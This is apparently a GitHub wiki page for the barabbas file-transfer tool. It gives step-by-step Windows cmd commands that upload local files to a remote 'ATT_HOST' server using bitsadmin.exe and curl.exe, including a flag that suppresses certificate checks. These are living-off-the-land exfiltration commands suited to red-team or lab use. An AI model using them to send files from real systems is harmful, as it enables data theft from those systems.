File Upload ➔ Windows ➔ cmd

OVERVIEW:

bitsadmin.exe (HTTP; HTTPS)
curl.exe (HTTP; HTTPS)

(identify supported options - Windows - file upload - cmd)

@ECHO OFF & ECHO [*] cmd - file upload - available options & FOR %i IN (bitsadmin.exe curl.exe) DO @ECHO OFF & ECHO    [*] %i & dir /s /b C:\*%i & ECHO. & @ECHO ON

`bitsadmin.exe` (HTTP; HTTPS)

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

uses BITS_POST (HTTP request method) for file upload
- check barabbas source code for more information
may get stuck (BITSadmin client not starting upload)
- restart web server (barabbas)
when uploading via HTTPS, copy target file to (current) user directory
- may result with an error, otherwise

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set LFILE=testfile_200MB
set BITS_JOB=test

NOTE: copy target file to current directory

3. [CLIENT] upload file

bitsadmin.exe /transfer %BITS_JOB% /upload /priority FOREGROUND http://%ATT_HOST%/%LFILE% %CD%\%LFILE%
certutil.exe -hashfile %CD%\%LFILE% MD5

NOTE: if using HTTPS, replace http with https

(HTTPS with self-signed X.509 certificate)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set LFILE=testfile_200MB
set BITS_JOB=test

NOTE: copy target file to current directory

3. [CLIENT] upload file

bitsadmin.exe /create /upload %BITS_JOB%
bitsadmin.exe /setpriority %BITS_JOB% FOREGROUND
bitsadmin.exe /SetSecurityFlags %BITS_JOB% 30
bitsadmin.exe /addfile %BITS_JOB% https://%ATT_HOST%/%LFILE% %CD%\%LFILE%
bitsadmin.exe /resume %BITS_JOB%
bitsadmin.exe /info %BITS_JOB%
bitsadmin.exe /cancel %BITS_JOB%
certutil.exe -hashfile %CD%\%LFILE% MD5

`curl.exe` (HTTP; HTTPS)

https://learn.microsoft.com/en-us/virtualization/community/team-blog/2017/20171219-tar-and-curl-come-to-windows

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

supports file upload via HTTP request methods:
- POST
- PUT
HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
- its Common Name field must contain, either:
  - DNS resolvable hostname
  - IP address of web server

(`HTTP PUT` - HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set LFILE=testfile_200MB

NOTE: copy target file to current directory

3. [CLIENT] upload file

curl -T %CD%\%LFILE% http://%ATT_HOST%/%LFILE%
certutil.exe -hashfile %CD%\%LFILE% MD5

NOTE: if using HTTPS, replace http with https

(`HTTP POST` - HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set LFILE=testfile_200MB

NOTE: copy target file to current directory

3. [CLIENT] upload file

curl.exe -F file=@%CD%\%LFILE% http://%ATT_HOST%/
certutil.exe -hashfile %CD%\%LFILE% MD5

NOTE: if using HTTPS, replace http with https

UL_ _Win_ _cmd - lighthouseitsecurity/barabbas GitHub Wiki

File Upload ➔ Windows ➔ cmd

`bitsadmin.exe` (HTTP; HTTPS)

(HTTP/HTTPS)

(HTTPS with self-signed X.509 certificate)

`curl.exe` (HTTP; HTTPS)

(`HTTP PUT` - HTTP/HTTPS)

(`HTTP POST` - HTTP/HTTPS)

⚠️ GitHub.com Fallback ⚠️

UL_ _Win_ _cmd - lighthouseitsecurity/barabbas GitHub Wiki

File Upload ➔ Windows ➔ cmd

bitsadmin.exe (HTTP; HTTPS)

(HTTP/HTTPS)

(HTTPS with self-signed X.509 certificate)

curl.exe (HTTP; HTTPS)

(HTTP PUT - HTTP/HTTPS)

(HTTP POST - HTTP/HTTPS)

⚠️ **GitHub.com Fallback** ⚠️

`bitsadmin.exe` (HTTP; HTTPS)

`curl.exe` (HTTP; HTTPS)

(`HTTP PUT` - HTTP/HTTPS)

(`HTTP POST` - HTTP/HTTPS)

⚠️ GitHub.com Fallback ⚠️